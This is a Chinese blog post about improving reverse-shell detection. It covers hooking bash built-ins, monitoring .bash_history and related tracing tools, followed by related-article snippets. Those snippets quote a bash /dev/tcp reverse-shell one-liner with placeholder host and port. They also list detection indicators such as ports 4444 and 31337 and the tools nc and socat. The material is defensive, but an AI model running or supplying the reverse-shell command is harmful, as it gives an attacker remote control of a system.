反弹shell检测增强思考

原创 已于 2023-06-19 10:48:57 修改 · 544 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2023-02-03 10:05:29 首次发布
文章探讨了如何劫持Bash的内置命令,分析了这些命令是否通过so库执行,以及不同平台的函数劫持方法。提到监控.bash_history文件来跟踪终端操作,并讨论了pdb在函数地址查找中的作用。文章还提到了eBPF在网络安全监测中的应用,并列举了多种相关技术资源。

思路

1.我们有内置bash命令,可以用enable查看,而想劫持这些命令,我们有如下研究和思考流程
2.bash的内置命令,是否走so库,也就是是否走动态链接库,因为如果对于这些命令直接静态编译到程序中是无法劫持的,但是应该会走so(对于windows都走ntdll.dll,也就是操作系统会通过一个so库做api导出,之后最后走syscall调用具体服务,应该不会自己内置syscall在bash的代码中),也就是我们要确认如下

2.1 bash内置命令是否走so库

2.2 如果不走so则无法劫持

劫持函数调用的方法

1.如果是对于so或dll劫持,只需要劫持导入函数即可,实现其导入函数,也就是替换掉对应的dll或者so文件,

2.如果不是导入劫持,而是程序中函数劫持,windows,需要直接取函数地址,之后替换,或需要在内存中搜索函数特征,之后进行inline劫持

监控.history方法

可以尝试监控.bash_history,这个方法对于bash有用,zsh可能会存在其他路径,并且要用netlink监控,inotify不会返回相应fd节点

pdb与其关系

对于劫持函数其实仅仅是劫持函数地址,也就是知道函数在哪里,有没有pdb,既地址对应什么函数,函数名,其实没什么关系,导入导出表劫持,或内存劫持,对其都没关系

最终结果

验证了所有bash内置的命令,都不走so库

参考资料

api - What is the Linux Equivalent of Kernel32.dll? - Stack Overflow

GDB调试实战给程序传递启动参数 (cha138.com)

bash命令审计,记录终端操作指令 | HI~ 杨小样 (yoncan.github.io)

Index of /gnu/bash

黑盒测试某安全设备监控报警的绕过 (f5.pm)

基于 eBPF 的开源项目 eCapture 介绍:无需 CA 证书抓 https 网络明文通讯 | IT瘾 (itindex.net)

perf-tools/uprobe_example.txt at master · brendangregg/perf-tools (github.com)

[原创] ELF Hook总结与代码实现-Android安全-看雪论坛-安全社区|安全招聘|bbs.pediy.com (kanxue.com)

理解glib和glibc(libc.so.6)_ubuntu libc.so.6_zhojiew的博客-优快云博客

namhyung/uftrace: Function graph tracer for C/C++/Rust (github.com)

Index of /gnu/bash

c++ - Trace libc and system call function calls on Linux? - Stack Overflow

How to Make Static Linked Elf File to Load Ld_Preload .So - ITCodar

shell - How can I access the history buffer in sh? (not in Bash) - Unix & Linux Stack Exchange

自动化反弹Shell防御技术 - 腾讯云开发者社区-腾讯云 (tencent.com)

如何利用AgentSmith-HIDS检测反弹shell - 开发者头条 (toutiao.io)

【机器学习】基于机器学习的反弹shell命令识别_Coder_preston的博客-优快云博客

云安全中心反弹Shell多维检测技术详解_云安全中心(态势感知)-阿里云帮助中心 

基于主机的反弹shell检测思路
SHELLCODE_8BIT的博客
03-16 2295
前言 难免有时候网站会存在命令执行、代码执行等漏洞可能被黑客反弹shell,如何第一时间发现反弹shell特征,kill掉相应进程,保护主机安全呢? 本文主要探究一下主机反弹shell有哪些特征,为HIDS检测主机反弹shell行为提供一些思路。 类型一 bash反弹 先从最常规的开始举个例子。 bash -i >& /dev/tcp/ip/port 0>&1 原理简单说一下,本地打开bash将标准输出、标准错误输出、标准输入通过socket链接重定向至远程 &g
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
Windows反弹shell测试
oscarli的博客
05-30 458
windows反弹shell测试记录
渗透测试--反弹shell(1)
weixin_43520214的博客
09-18 1482
反弹shell(Reverse Shell)是一种计算机安全领域的术语,通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况:攻击者首先在自己的机器上监听某个特定的网络端口,然后通过某种手段(例如利用软件漏洞)在目标系统上执行一段代码,这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接,攻击者就可以通过这个连接对目标系统发送命令并接收其输出,从而达到远程控制目标系统的目的。反弹shell与普通(正向)shell的主要区别在于连接的方向。
HIDS反弹shell检测方法
王教主的博客
02-24 1285
检测方法 特征:shell(sh bash zsh)进程存在异常的stdin/stdout、异常参数、异常网络连接。 行为:检测大概率是在ssh登陆下才会使用的二进制文件(如ls/cat/ip/ipconfig/cd/chmod),1.如果发现这些进程的stdin/stdout和tty不一致则告警;2.如果发现这些进程的dip/dport/sip/sport和SSH_CONNECTION不一致则告警 反弹手段和检测方法 反弹方法 检测方法 bash -i >& /dev/t
反弹shell的方法和测试
weixin_43847235的博客
11-14 716
反弹shell的概念 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)????/ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹shell去...
kindeditor文件上传反弹shell
最新发布
04-03
嗯,用户想了解KindEditor文件上传漏洞导致反弹shell的原理和防御措施。首先,我得回忆一下KindEditor这个编辑器,它以前挺流行的,但可能存在一些安全漏洞,特别是文件上传部分。文件上传漏洞通常是因为没有对上传...
BCS演讲实录 | 未来智安CTO陈毓端精讲《XDR扩展威胁检测响应探索与实践》
XDRSEC的博客
07-29 852
未来智安(XDR SEC)联合创始人兼CTO陈毓端受邀做客直播间,并发表主题演讲《XDR扩展威胁检测响应探索与实践》。
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
热门推荐
杨秀璋的专栏
06-25 2万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
【机器学习】基于机器学习的反弹shell命令识别
一个程序员
12-03 944
本文介绍一个基于机器学习识别反弹shell的项目。 在主机安全检测中,一般是采用基于原理的方式识别反弹shell, 通过判断socket通信相关特征,可以准确地识别到主机中的反弹shell。 但是在容器场景下,检测反弹shell 的能力,可能会受到容器网络模式的限制,在容器默认运行的bridge 模式下, 是很难通过基于原理的方式识别反弹shell的。bridge模式 反弹shell 参考资料https://xz.aliyun.com/t/6727https://help.aliyun.com/docu
反弹shell监控
ai749499的博客
01-13 481
转自:http://pirogue.org/2017/07/25/reverse-shell/ 一、跟踪系统调用 1. strace bash test.sh root@Kali:~/pirogue/reverse_shell# strace bash test.sh execve("/bin/bash", ["bash", "test.sh"], [/* 50 v...
反弹shell检测的一些思路
2401_84466361的博客
06-04 1147
反弹shell是攻击者常用的手段之一,通过反弹Shell,攻击者可以绕过防火墙,获取目标系统的shell访问权限,进行后续的恶意操作。因此,及时检测并阻止反弹Shell行为对于安全防护来说非常重要。本文通过介绍反弹shell的常用手段,探讨检测的思路以及简单的代码实现。
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 9477
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
入侵检测——如何实现反弹shell检测
qq_42009262的博客
03-24 4213
如何实现反弹shell检测
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2861
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.youkuaiyun.com/article/details/114970239 Linux常用提权方法: https://xunmi.blog.youkuaiyun.com/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
【渗透测试】反弹 Shell 技术详解(二)
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
03-13 1091
通过伪终端中转与通过管道等中转原理一样,但通过伪终端中转的检测难度大大提升,单从Shell的标准输入输出来看,和正常打开的终端没有什么区别。通过跟踪FD(文件描述符File Descriptor)和进程的关系可以检测该数据通道,判断是否为bash进程,获取bash父进程的/proc/[pid]/fd,判断是否有存在fd重定向到pipe或者socket情况。:这类反弹Shell检测可以通过检测Shell的标准输入、标准输出是否被重定向到Socket或检测一些简单的主机网络日志特征来实现。
利用Falco监控反弹Shell
蚁景网安学院
02-10 1228
点击"蓝字"关注,获取更多技术内容前言网络对抗愈加激烈,各种攻击手法层出不穷,在安全左移的同时,如何做到快速的应急响应,也是攻防中的一大重点。本文将以Falco为例,来达到反弹Shell的...
干货分享—Linux之渗透测试常用反弹shell方法总结!黑客技术零基础入门到精通实战教程!
白帽阿叁的博客
01-08 1071
反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以想办法避开防火墙和路由的一些限制的!
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 4444、31337)。 2. 检查系统进程:使用 ps 或 top 命令检查正在运行的进程列表,查找不明确的、不信任的或异常的进程。特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见文件名和路径(如 .bashrc、.bash_profile、.ssh/authorized_keys)。 4. 检查系统日志:查看系统日志文件,如 /var/log/auth.log 或 /var/log/secure,检查是否存在异常登录尝试或认证失败记录,以及与反弹 shell 相关的异常日志。 5. 使用专业工具:使用专门的安全工具,如 LOKI、Lynis、AIDE 等,来扫描系统并检测可能的反弹 shell 活动。这些工具可以自动化检测系统中的恶意活动和异常行为。 请注意,这些方法可以帮助您发现潜在的反弹 shell 活动,但不能保证绝对的安全。建议您定期更新系统、安装最新的安全补丁,并采取其他安全措施来确保系统的安全性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值